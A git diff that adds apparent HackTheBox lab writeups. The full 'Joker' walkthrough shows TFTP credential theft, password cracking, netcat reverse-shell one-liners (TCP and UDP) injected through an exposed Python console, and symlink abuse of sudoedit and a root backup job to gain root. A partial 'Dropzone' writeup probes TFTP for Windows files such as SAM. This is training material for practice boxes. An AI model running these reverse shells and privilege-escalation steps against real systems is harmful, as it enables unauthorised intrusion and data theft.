diff --git a/Easy/prg/71_001.png b/Easy/prg/71_001.png
new file mode 100644
index 0000000..98d608f
Binary files /dev/null and b/Easy/prg/71_001.png differ
diff --git a/Easy/prg/71_002.png b/Easy/prg/71_002.png
new file mode 100644
index 0000000..58c0bfd
Binary files /dev/null and b/Easy/prg/71_002.png differ
diff --git a/Easy/prg/71_003.png b/Easy/prg/71_003.png
new file mode 100644
index 0000000..16ffe12
Binary files /dev/null and b/Easy/prg/71_003.png differ
diff --git a/Easy/prg/71_004.png b/Easy/prg/71_004.png
new file mode 100644
index 0000000..3124477
Binary files /dev/null and b/Easy/prg/71_004.png differ
diff --git a/Easy/prg/71_005.png b/Easy/prg/71_005.png
new file mode 100644
index 0000000..0ccf7e7
Binary files /dev/null and b/Easy/prg/71_005.png differ
diff --git a/Easy/prg/71_006.png b/Easy/prg/71_006.png
new file mode 100644
index 0000000..8312e27
Binary files /dev/null and b/Easy/prg/71_006.png differ
diff --git a/Easy/prg/71_007.png b/Easy/prg/71_007.png
new file mode 100644
index 0000000..d77e179
Binary files /dev/null and b/Easy/prg/71_007.png differ
diff --git a/Easy/prg/9_001.png b/Easy/prg/9_001.png
new file mode 100644
index 0000000..442f999
Binary files /dev/null and b/Easy/prg/9_001.png differ
diff --git a/Easy/prg/9_002.png b/Easy/prg/9_002.png
new file mode 100644
index 0000000..495f79b
Binary files /dev/null and b/Easy/prg/9_002.png differ
diff --git a/Easy/prg/9_003.png b/Easy/prg/9_003.png
new file mode 100644
index 0000000..8410df6
Binary files /dev/null and b/Easy/prg/9_003.png differ
diff --git a/Easy/prg/9_004.png b/Easy/prg/9_004.png
new file mode 100644
index 0000000..1a921a0
Binary files /dev/null and b/Easy/prg/9_004.png differ
diff --git a/Easy/prg/9_005.png b/Easy/prg/9_005.png
new file mode 100644
index 0000000..9a032d9
Binary files /dev/null and b/Easy/prg/9_005.png differ
diff --git a/Easy/prg/9_006.png b/Easy/prg/9_006.png
new file mode 100644
index 0000000..041e5d7
Binary files /dev/null and b/Easy/prg/9_006.png differ
diff --git a/Easy/prg/9_007.png b/Easy/prg/9_007.png
new file mode 100644
index 0000000..32f9cdc
Binary files /dev/null and b/Easy/prg/9_007.png differ
diff --git a/Easy/prg/9_008.png b/Easy/prg/9_008.png
new file mode 100644
index 0000000..682477a
Binary files /dev/null and b/Easy/prg/9_008.png differ
diff --git a/Easy/prg/9_009.png b/Easy/prg/9_009.png
new file mode 100644
index 0000000..54a70da
Binary files /dev/null and b/Easy/prg/9_009.png differ
diff --git a/Hard/0.md b/Hard/0.md
new file mode 100644
index 0000000..f13ef24
--- /dev/null
+++ b/Hard/0.md
@@ -0,0 +1,66 @@
+# Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/1.md b/Hard/1.md
new file mode 100644
index 0000000..3ed7e0f
--- /dev/null
+++ b/Hard/1.md
@@ -0,0 +1,462 @@
+# Joker Writeup
+
+
+
+## Introduction :
+
+Joker is a hard linux box released back in May 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.37/23 ] [ /dev/pts/16 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.21 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ Discovered open port 22/tcp on 10.10.10.21
+ Discovered open port 3128/tcp on 10.10.10.21
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.37/23 ] [ /dev/pts/10 ] [~]
+ → nmap -sCV 10.10.10.21 -Pn -p 22,3128
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-29 17:39 CEST
+ Nmap scan report for 10.10.10.21
+ Host is up (0.032s latency).
+ Not shown: 998 filtered ports
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 88:24:e3:57:10:9f:1b:17:3d:7a:f3:26:3d:b6:33:4e (RSA)
+ | 256 76:b6:f6:08:00:bd:68:ce:97:cb:08:e7:77:69:3d:8a (ECDSA)
+ |_ 256 dc:91:e4:8d:d0:16:ce:cf:3d:91:82:09:23:a7:dc:86 (ED25519)
+ 3128/tcp open http-proxy Squid http proxy 3.5.12
+ |_http-server-header: squid/3.5.12
+ |_http-title: ERROR: The requested URL could not be retrieved
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 21.78 seconds
+
+
+
+ [ 10.10.14.37/23 ] [ /dev/pts/11 ] [~]
+ → sudo nmap -sU 10.10.10.21 -p 69,5355
+ [sudo] password for nothing:
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-29 17:53 CEST
+ Nmap scan report for 10.10.10.21
+ Host is up (0.028s latency).
+
+ PORT STATE SERVICE
+ 69/udp open|filtered tftp
+ 5355/udp open|filtered llmnr
+
+ Nmap done: 1 IP address (1 host up) scanned in 1.62 second
+
+
+## **Part 2 : Getting User Access**
+
+The UDP scan picked up port 69 tftp so let's investigate it:
+
+
+ [ 10.10.14.37/23 ] [ /dev/pts/11 ] [~/_HTB/Joker]
+ → sudo pacman -S tftp-hpa
+ resolving dependencies...
+ looking for conflicting packages...
+
+ Packages (1) tftp-hpa-5.2-9
+
+ Total Download Size: 0,04 MiB
+ Total Installed Size: 0,09 MiB
+
+ :: Proceed with installation? [Y/n] y
+ :: Retrieving packages...
+ tftp-hpa-5.2-9-x86_64 37,8 KiB 1260 KiB/s 00:00 [###################################] 100%
+ (1/1) checking keys in keyring [###################################] 100%
+ (1/1) checking package integrity [###################################] 100%
+ (1/1) loading package files [###################################] 100%
+ (1/1) checking for file conflicts [###################################] 100%
+ (1/1) checking available disk space [###################################] 100%
+ :: Processing package changes...
+ (1/1) installing tftp-hpa [###################################] 100%
+ :: Running post-transaction hooks...
+ (1/2) Reloading system manager configuration...
+ (2/2) Arming ConditionNeedsUpdate...
+
+ [ 10.10.14.37/23 ] [ /dev/pts/11 ] [~/_HTB/Joker]
+ → tftp 10.10.10.21
+ tftp> get passwords
+ Recieved 48 bytes in 5.9 seconds
+
+
+Once we have the passwords file we will use john to crack it using the rockyou.txt wordlist:
+
+
+ john --wordlist=/usr/share/wordlists/rockyou.txt passwords
+
+
+Once it's done we have the credentials we need : ihateseafood (kalamari) so now let's make use of port 3128 (squid proxy) using firefox
+
+ 
+
+So that's one way of doing it, but we can also use foxyproxy to do that:
+
+
+
+Once that's done, visiting http://127.0.0.1 redirects us to a login prompt (where we put in the credentials john found earlier) and we are greeted by a shorty-url webpage. So we enumerate it using dirb
+
+
+
+
+ [ 10.10.14.37/23 ] [ /dev/pts/14 ] [~]
+ → dirb http://127.0.0.1 -p 10.10.10.21:3128 -P kalamari:ihateseafood -r
+
+ -----------------
+ DIRB v2.22
+ By The Dark Raver
+ -----------------
+
+ START_TIME: Wed Jul 29 18:19:04 2020
+ URL_BASE: http://127.0.0.1/
+ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
+ PROXY: 10.10.10.21:3128
+ PROXY AUTHORIZATION: kalamari:ihateseafood
+ OPTION: Not Recursive
+
+ -----------------
+
+ GENERATED WORDS: 4612
+
+ ---- Scanning URL: http://127.0.0.1/ ----
+ + http://127.0.0.1/console (CODE:200|SIZE:1479)
+
+
+now we visit http://127.0.0.1/console and we are greeted by a python interpreter into which we're going to inject our reverse shell. but before that we need to enumerate a bit:
+
+
+ >>> import os
+ >>> os.popen("whoami").read()
+ 'werkzeug\n'
+ >>> os.popen("nc -h").read()
+ ''
+ >>> os.popen("nc -h 2>&1").read()
+ 'OpenBSD netcat (Debian patchlevel 1.105-7ubuntu1)\nThis is nc from the netcat-openbsd package. An alternative nc is available\nin the netcat-traditional package.\nusage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]\n\t [-P proxy_username] [-p source_port] [-q seconds] [-s source]\n\t [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]\n\t [-x proxy_address[:port]] [destination] [port]\n\tCommand Summary:\n\t\t-4\t\tUse IPv4\n\t\t-6\t\tUse IPv6\n\t\t-b\t\tAllow broadcast\n\t\t-C\t\tSend CRLF as line-ending\n\t\t-D\t\tEnable the debug socket option\n\t\t-d\t\tDetach from stdin\n\t\t-h\t\tThis help text\n\t\t-I length\tTCP receive buffer length\n\t\t-i secs\t\tDelay interval for lines sent, ports scanned\n\t\t-j\t\tUse jumbo frame\n\t\t-k\t\tKeep inbound sockets open for multiple connects\n\t\t-l\t\tListen mode, for inbound connects\n\t\t-n\t\tSuppress name/port resolutions\n\t\t-O length\tTCP send buffer length\n\t\t-P proxyuser\tUsername for proxy authentication\n\t\t-p port\t\tSpecify local port for remote connects\n \t-q secs\t\tquit after EOF on stdin and delay of secs\n\t\t-r\t\tRandomize remote ports\n\t\t-S\t\tEnable the TCP MD5 signature option\n\t\t-s addr\t\tLocal source address\n\t\t-T toskeyword\tSet IP Type of Service\n\t\t-t\t\tAnswer TELNET negotiation\n\t\t-U\t\tUse UNIX domain socket\n\t\t-u\t\tUDP mode\n\t\t-V rtable\tSpecify alternate routing table\n\t\t-v\t\tVerbose\n\t\t-w secs\t\tTimeout for connects and final net reads\n\t\t-X proto\tProxy protocol: "4", "5" (SOCKS) or "connect"\n\t\t-x addr[:port]\tSpecify proxy address and port\n\t\t-Z\t\tDCCP mode\n\t\t-z\t\tZero-I/O mode [used for scanning]\n\tPort numbers can be individual or ranges: lo-hi [inclusive]\n'
+ >>>
+
+
+so here we see that netcat is here, and the flags we have here are **-46bCDdhjklnrStUuvZz** it is important to note that we do not have the -e flag so it's here that many other people who made the writeup of this box falsely claimed they could just use pentestmonkey's python reverse shell one liner because it contains the -e flag which is not here for netcat. So to go around this we'll use another reverse shell one liner :
+
+
+ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.37 9002 >/tmp/f
+
+
+Here it is important to add the & at the end because if this is not successful, the webservice will die on us and we would need to revert the box. This makes sure that the process runs in the background on another thread in order for us to keep using the box in case if it doesn't work.
+
+
+ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.37 9002 >/tmp/f &
+
+
+Now here we are dealing with a python interpreter so we need to wrap our payload within the os.popopen("").read() command:
+
+
+ import os
+ os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.37 9002 >/tmp/f &").read()
+
+
+Sadly this doesn't work, and that is because there are iptables. We can see that here:
+
+
+ >>> os.popen("find /etc | grep iptables").read()
+ '/etc/iptables\n/etc/iptables/rules.v4\n/etc/iptables/rules.v6\n'
+ >>> os.popen("base64 -w 0 /etc/iptables/rules.v4").read()
+ 'IyBHZW5lcmF0ZWQgYnkgaXB0YWJsZXMtc2F2ZSB2MS42LjAgb24gRnJpIE1heSAxOSAxODowMToxNiAyMDE3CipmaWx0ZXIKOklOUFVUIERST1AgWzQxNTczOjE4Mjk1OTZdCjpGT1JXQVJEIEFDQ0VQVCBbMDowXQo6T1VUUFVUIEFDQ0VQVCBbODc4OjIyMTkzMl0KLUEgSU5QVVQgLWkgZW5zMzMgLXAgdGNwIC1tIHRjcCAtLWRwb3J0IDIyIC1qIEFDQ0VQVAotQSBJTlBVVCAtaSBlbnMzMyAtcCB0Y3AgLW0gdGNwIC0tZHBvcnQgMzEyOCAtaiBBQ0NFUFQKLUEgSU5QVVQgLWkgZW5zMzMgLXAgdWRwIC1qIEFDQ0VQVAotQSBJTlBVVCAtaSBlbnMzMyAtcCBpY21wIC1qIEFDQ0VQVAotQSBJTlBVVCAtaSBsbyAtaiBBQ0NFUFQKLUEgT1VUUFVUIC1vIGVuczMzIC1wIHRjcCAtbSBzdGF0ZSAtLXN0YXRlIE5FVyAtaiBEUk9QCkNPTU1JVAojIENvbXBsZXRlZCBvbiBGcmkgTWF5IDE5IDE4OjAxOjE2IDIwMTcK'
+ >>>
+
+
+then we decode it locally :
+
+
+ echo 'B64STRING' | base64 -d > iptables.v4
+
+
+
+ [ 10.10.14.37/23 ] [ /dev/pts/8 ] [~/_HTB/Joker]
+ → echo 'IyBHZW5lcmF0ZWQgYnkgaXB0YWJsZXMtc2F2ZSB2MS42LjAgb24gRnJpIE1heSAxOSAxODowMToxNiAyMDE3CipmaWx0ZXIKOklOUFVUIERST1AgWzQxNTczOjE4Mjk1OTZdCjpGT1JXQVJEIEFDQ0VQVCBbMDowXQo6T1VUUFVUIEFDQ0VQVCBbODc4OjIyMTkzMl0KLUEgSU5QVVQgLWkgZW5zMzMgLXAgdGNwIC1tIHRjcCAtLWRwb3J0IDIyIC1qIEFDQ0VQVAotQSBJTlBVVCAtaSBlbnMzMyAtcCB0Y3AgLW0gdGNwIC0tZHBvcnQgMzEyOCAtaiBBQ0NFUFQKLUEgSU5QVVQgLWkgZW5zMzMgLXAgdWRwIC1qIEFDQ0VQVAotQSBJTlBVVCAtaSBlbnMzMyAtcCBpY21wIC1qIEFDQ0VQVAotQSBJTlBVVCAtaSBsbyAtaiBBQ0NFUFQKLUEgT1VUUFVUIC1vIGVuczMzIC1wIHRjcCAtbSBzdGF0ZSAtLXN0YXRlIE5FVyAtaiBEUk9QCkNPTU1JVAojIENvbXBsZXRlZCBvbiBGcmkgTWF5IDE5IDE4OjAxOjE2IDIwMTcK' | base64 -d > iptables.v4
+
+ [ 10.10.14.37/23 ] [ /dev/pts/8 ] [~/_HTB/Joker]
+ → nano iptables.v4
+
+
+
+ # Generated by iptables-save v1.6.0 on Fri May 19 18:01:16 2017
+ *filter
+ :INPUT DROP [41573:1829596]
+ :FORWARD ACCEPT [0:0]
+ :OUTPUT ACCEPT [878:221932]
+ -A INPUT -i ens33 -p tcp -m tcp --dport 22 -j ACCEPT
+ -A INPUT -i ens33 -p tcp -m tcp --dport 3128 -j ACCEPT
+ -A INPUT -i ens33 -p udp -j ACCEPT
+ -A INPUT -i ens33 -p icmp -j ACCEPT
+ -A INPUT -i lo -j ACCEPT
+ -A OUTPUT -o ens33 -p tcp -m state --state NEW -j DROP
+ COMMIT
+ # Completed on Fri May 19 18:01:16 2017
+
+
+And here we see the problem, because we can only use a few ports for tcp (22 and 3128) , and the box accepts icmp (ping requests) as well as udp. So the easiest way to do it from here, is to spawn a reverse shell on a udp port instead of tcp.
+
+
+ import os
+ os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.14.13 9002 >/tmp/f &").read()
+
+
+and of course, to recieve the reverse shell, we also need the -u flag on our end to make sure it is on our udp port:
+
+
+ nc -u -lvnp 9002
+
+
+` 
+
+Now that we got our reverse shell, we are logged in as the user "werkzeug", we will first of all upgrade our reverse shell to a fully interactive shell:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Joker]
+ → nc -u -lvnp 9002
+ listening on [any] 9002 ...
+ connect to [10.10.14.8] from (UNKNOWN) [10.10.10.21] 48079
+ /bin/sh: 0: can't access tty; job control turned off
+ $ which bash
+ /bin/bash
+ $ which bash sh curl wget python python3
+ /bin/bash
+ /bin/sh
+ /usr/bin/curl
+ /usr/bin/wget
+ /usr/bin/python
+ /usr/bin/python3
+ $ python3 -c 'import pty; pty.spawn("/bin/bash")'
+ werkzeug@joker:~$ ^Z
+ [1] + 18172 suspended nc -u -lvnp 9002
+
+ [ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Joker]
+ → stty raw -echo ; fg
+ [1] + 18172 continued nc -u -lvnp 9002
+ export TERM=screen-256color
+ werkzeug@joker:~$ export SHELL=bash
+ werkzeug@joker:~$ stty rows 50 columns 200
+ werkzeug@joker:~$ reset
+
+
+
+This reverse shell is very glitchy due to the use of the UDP protocol so make sure to press enter in between each previous step to make sure you get output.
+
+Now we could run a privesc script to find the vulnerabilities for us, but it is a fairly simple one, we just type sudo -l
+
+
+
+and here we see what this box is about, the user we are logged in as (werkzeug) may run the sudoedit command on joker as the user alekos on /var/www/*/*/layout.html
+
+if we run dpkg -l sudo :
+
+
+
+We see that sudo is version 1.8.16.0 and if we run a searchsploit command on this, we see that there is an exploit for it (namely 11651.sh and 37710.txt)
+
+So the idea here is, that you can take advantage of this wildcard vulnerability in sudo using symlinks and therefore being able to edit files that you are not supposed to be able to edit. Namely the authorized_key file in root's .ssh directory to put our public key in:
+
+
+ [terminal 1]
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Joker]
+ → cat ~/.ssh/mahakaliVM.pub
+ ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMOJqQ6+ycZGjPXSNkZ3zvgaHhEyLGcFb7fPfEIZSQl8 nothing@mahakali
+
+
+ [terminal 2]
+ werkzeug@joker:~/testing/nihilist$ ln -s /home/alekos/.ssh/authorized_keys layout.html
+ werkzeug@joker:~/testing/nihilist$ ls -lash
+ total 8.0K
+ 4.0K drwxrwxr-x 2 werkzeug werkzeug 4.0K Jul 6 22:31 .
+ 4.0K drwxr-xr-x 3 werkzeug werkzeug 4.0K Jul 6 22:30 ..
+ 0 lrwxrwxrwx 1 werkzeug werkzeug 33 Jul 6 22:31 layout.html -> /home/alekos/.ssh/authorized_keys
+
+ werkzeug@joker:~/testing/nihilist$ sudoedit -u alekos /var/www/testin/nihilistlayout.html
+
+ Unable to create directory /var/www/.nano: Permission denied
+ It is required for saving/loading search history or cursor positions.
+
+ Press Enter to continue
+
+ werkzeug@joker:~/testing/nihilist$cat layout.html
+ ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMOJqQ6+ycZGjPXSNkZ3zvgaHhEyLGcFb7fPfEIZSQl8 nothing@mahakali
+
+
+
+Now that our public key is in alekos's authorized_keys file, let's ssh as alekos:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Joker]
+ → ssh alekos@10.10.10.21 -i ~/.ssh/mahakaliVM
+ The authenticity of host '10.10.10.21 (10.10.10.21)' can't be established.
+ ECDSA key fingerprint is SHA256:1yj4blzJwO5TYIZYFB3HMwXEqeflHc2iF1Idp3lZ94k.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.21' (ECDSA) to the list of known hosts.
+ Welcome to Ubuntu 16.10 (GNU/Linux 4.8.0-52-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 0 packages can be updated.
+ 0 updates are security updates.
+
+
+ Last login: Sat May 20 16:38:08 2017 from 10.10.13.210
+ alekos@joker:~$ id
+ uid=1001(alekos) gid=1001(alekos) groups=1001(alekos),1000(werkzeug)
+ alekos@joker:~$ ls -l
+ total 20
+ drwxrwx--- 2 root alekos 12288 Jul 6 22:40 backup
+ drwxr-x--- 5 alekos alekos 4096 May 18 2017 development
+ -r--r----- 1 root alekos 33 May 19 2017 user.txt
+ alekos@joker:~$ cat user.txt
+ a2XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And there you go! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc to root on this box we're going to take a look at alekos's files:
+
+
+ alekos@joker:~$ ls -lash backup/
+ total 336K
+ 12K drwxrwx--- 2 root alekos 12K Jul 6 22:45 .
+ 4.0K drwxr-xr-x 7 alekos alekos 4.0K May 19 2017 ..
+ 40K -rw-r----- 1 root alekos 40K Dec 24 2017 dev-1514134201.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Dec 24 2017 dev-1514134501.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:20 dev-1625599201.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:25 dev-1625599501.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:30 dev-1625599801.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:35 dev-1625600101.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:40 dev-1625600401.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:45 dev-1625600701.tar.gz
+
+
+here we see that a backup is being made every 5 minutes by the root user. So let's extract one of these backups to see what it does:
+
+
+ alekos@joker:~/backup$ mkdir extract
+ alekos@joker:~/backup$ cd extract
+ alekos@joker:~/backup/extract$ cp ../dev-1625601001.tar.gz .
+ alekos@joker:~/backup/extract$ gunzip -d dev-1625601001.tar.gz
+
+ gzip: dev-1625601001.tar.gz: not in gzip format
+ alekos@joker:~/backup/extract$ ls -l
+ total 40
+ -rw-r----- 1 alekos alekos 40960 Jul 6 22:50 dev-1625601001.tar.gz
+ alekos@joker:~/backup/extract$ file dev-1625601001.tar.gz
+ dev-1625601001.tar.gz: POSIX tar archive (GNU)
+ alekos@joker:~/backup/extract$ tar -xvf dev-1625601001.tar.gz
+ __init__.py
+ application.py
+ data/
+ data/shorty.db
+ models.py
+ static/
+ static/style.css
+ templates/
+ templates/layout.html
+ templates/not_found.html
+ templates/list.html
+ templates/display.html
+ templates/new.html
+ utils.py
+ views.py
+ alekos@joker:~/backup/extract$ ls -lash ../../development/
+ total 36K
+ 4.0K drwxr-x--- 5 alekos alekos 4.0K May 18 2017 .
+ 4.0K drwxr-xr-x 7 alekos alekos 4.0K Jul 6 22:50 ..
+ 4.0K -rw-r----- 1 alekos alekos 1.5K May 18 2017 application.py
+ 4.0K drwxrwx--- 2 alekos alekos 4.0K May 18 2017 data
+ 0 -rw-r----- 1 alekos alekos 0 May 18 2017 __init__.py
+ 4.0K -rw-r----- 1 alekos alekos 997 May 18 2017 models.py
+ 4.0K drwxr-x--- 2 alekos alekos 4.0K May 18 2017 static
+ 4.0K drwxr-x--- 2 alekos alekos 4.0K May 18 2017 templates
+ 4.0K -rw-r----- 1 alekos alekos 2.5K May 18 2017 utils.py
+ 4.0K -rw-r----- 1 alekos alekos 1.8K May 18 2017 views.py
+ alekos@joker:~/backup/extract$
+
+
+And here we see that basically there is a backup of the development folder that's being made every 5 minutes. So we basically make a symbolic link to /root/ so that the next backup that's being made is going to be that of the **/root/** directory where the root flag is.
+
+
+ alekos@joker:~$ date
+ Tue Jul 6 22:53:48 EEST 2021
+ alekos@joker:~$ ls -l
+ total 20
+ drwxrwx--- 3 root alekos 12288 Jul 6 22:50 backup
+ drwxr-x--- 5 alekos alekos 4096 May 18 2017 development
+ -r--r----- 1 root alekos 33 May 19 2017 user.txt
+ alekos@joker:~$ mv development/ dev.bak
+ alekos@joker:~$ ln -s /root/ development
+ alekos@joker:~$ ls -lash
+ total 52K
+ 4.0K drwxr-xr-x 7 alekos alekos 4.0K Jul 6 22:54 .
+ 4.0K drwxr-xr-x 3 root root 4.0K May 16 2017 ..
+ 12K drwxrwx--- 3 root alekos 12K Jul 6 22:50 backup
+ 0 -rw------- 1 root root 0 May 17 2017 .bash_history
+ 4.0K -rw-r--r-- 1 alekos alekos 220 May 16 2017 .bash_logout
+ 4.0K -rw-r--r-- 1 alekos alekos 3.7K May 16 2017 .bashrc
+ 4.0K drwx------ 2 alekos alekos 4.0K May 17 2017 .cache
+ 4.0K drwxr-x--- 5 alekos alekos 4.0K May 18 2017 dev.bak
+ 0 lrwxrwxrwx 1 alekos alekos 6 Jul 6 22:54 development -> /root/
+ 4.0K drwxr-xr-x 2 alekos alekos 4.0K May 17 2017 .nano
+ 4.0K -rw-r--r-- 1 alekos alekos 655 May 16 2017 .profile
+ 4.0K drwxr-xr-x 2 alekos alekos 4.0K May 20 2017 .ssh
+ 4.0K -r--r----- 1 root alekos 33 May 19 2017 user.txt
+ alekos@joker:~$ date
+ Tue Jul 6 22:54:13 EEST 2021
+
+
+We wait for the next backup to happen, and then we extract it:
+
+
+ alekos@joker:~$ date
+ Tue Jul 6 22:55:19 EEST 2021
+ alekos@joker:~$ cd backup/
+ alekos@joker:~/backup$ ls -lash
+ total 392K
+ 12K drwxrwx--- 3 root alekos 12K Jul 6 22:55 .
+ 4.0K drwxr-xr-x 7 alekos alekos 4.0K Jul 6 22:54 ..
+ 40K -rw-r----- 1 root alekos 40K Dec 24 2017 dev-1514134201.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Dec 24 2017 dev-1514134501.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:20 dev-1625599201.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:25 dev-1625599501.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:30 dev-1625599801.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:35 dev-1625600101.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:40 dev-1625600401.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:45 dev-1625600701.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:50 dev-1625601001.tar.gz
+ 12K -rw-r----- 1 root alekos 10K Jul 6 22:55 dev-1625601301.tar.gz
+ 4.0K drwxrwxr-x 5 alekos alekos 4.0K Jul 6 22:51 extract
+ alekos@joker:~/backup$ tar -xvf dev-1625601301.tar.gz
+ backup.sh
+ root.txt
+ alekos@joker:~/backup$ cat root.txt
+ d4XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We got the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Hard/10.md b/Hard/10.md
new file mode 100644
index 0000000..995507b
--- /dev/null
+++ b/Hard/10.md
@@ -0,0 +1,683 @@
+# Dropzone Writeup
+
+
+
+## Introduction :
+
+Dropzone is a hard windows box released back in May 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/16 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.90 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ [sudo] password for nothing:
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Discovered open port 69/udp on 10.10.10.90
+
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [~]
+ → sudo nmap -sU -p69 -sCV -Pn 10.10.10.90
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-21 09:45 CET
+ Nmap scan report for 10.10.10.90
+ Host is up (0.033s latency).
+
+ PORT STATE SERVICE VERSION
+ 69/udp open tftp SolarWinds Free tftpd
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 0.58 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+So we know that we have tftp port opened, now let's enumerate it:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/2 ] [~]
+ → tftp 10.10.10.90
+ tftp> get /windows
+ Error code 1: Access to the path 'C:\windows' is denied.
+ tftp> get /%USERNAME%
+ Error code 1: Could not find file 'C:\%USERNAME%'.
+ tftp> get /windows/system32/config/SAM
+ Error code 1: The process cannot access the file 'C:\windows\system32\config\SAM' because it is being used by another process.
+ tftp> get /Documents and Settings
+ tftp: Documents: Is a directory
+ Error code 1: Could not find file 'C:\and'.
+ Error code 1: Could not find file 'C:\Settings'.
+ tftp>
+
+ tftp> get 'Documents and Settings'
+ Error code 1: Could not find file 'C:\'Documents'.
+ Error code 1: Could not find file 'C:\and'.
+ Error code 1: Could not find file 'C:\Settings''.
+ tftp> get "Documents and Settings"
+ Error code 0: Bailing out to bad characters in filename: '"Documents'.
+ Error code 1: Could not find file 'C:\and'.
+ Error code 0: Bailing out to bad characters in filename: 'Settings"'.
+ tftp>
+
+
+
+
+Here we see a few things, first of all this is a windows machine because the first error tells us that the path C:\Windows exists but it's access is denied. Second of all, it looks like we cannot access the Documents and settings folder even when we wrap it in '' or "". This is because on older windows machines, there could not be long filenames, therefore the folder names would be 6 characters long and the number of whatever folder would match these first 8 letters like so:
+
+
+ tftp> get Docume~1
+ Error code 1: Access to the path 'C:\Documents and Settings' is denied.
+ tftp> get Docume~1/Admini~1
+ Error code 1: Access to the path 'C:\Documents and Settings\Administrator' is denied.
+ tftp>
+
+
+
